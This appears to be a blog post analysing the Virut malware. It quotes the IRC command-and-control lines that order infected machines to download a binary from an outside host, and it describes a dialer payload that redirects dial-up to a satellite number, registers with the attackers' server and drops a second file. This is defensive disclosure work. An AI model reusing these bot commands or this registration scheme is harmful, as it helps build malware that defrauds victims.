The saga of Virut continues
I decided to poke around Virut a bit more. I followed the IRC trail, and spotted the following:
USER u394876 . . :_
NICK ssajvgia
JOIN &virtu
:ssajvgia!~u394876@xxx.xxx.xx.xxx JOIN :&virtu
:* PRIVMSG ssajvgia :!get http://www.ircer.pl:XX/XX.gif
So, what we have here is the C&C server at proxima.ircgalaxy.pl commanding the new infectees to download a binary from www.ircer.pl
Here are some info easily glanced from the binary:
File: XX.gif
Size: 36352
MD5: 9BA6B2B5A139369D77B695670FE63DC9
Packed with: [UPX v2.0 -> Markus, Laszlo & Reiser (h) SN:1308]
After unpacking the sample with the UPX command-line tool , the size was expanded to 71680 bytes. The file is written in Delphi.
One of the functionalities the file has is it modifies the dial-up settings to point the entries towards the number 00881839150099. It’ll also use the username pol001 and password p07l88 on the connection. Quick search would indicate that +881 8 is a prefix for GlobalStar satellite phones.
The malware will also register itself to the creator(s) by going to http://www.zief.pl/install.php?id=<unique id> using “MaxD” as the User-Agent.
An additional, FSG packed file is also dropped and executed.
So, it seems that the person(s) behind this are running atleast 3 domains:
ircer.pl
ircgalaxy.pl
zief.pl
and in addition to those, the infectees are getting creamed with the bills they’ll be receiving from calling the satellite phone.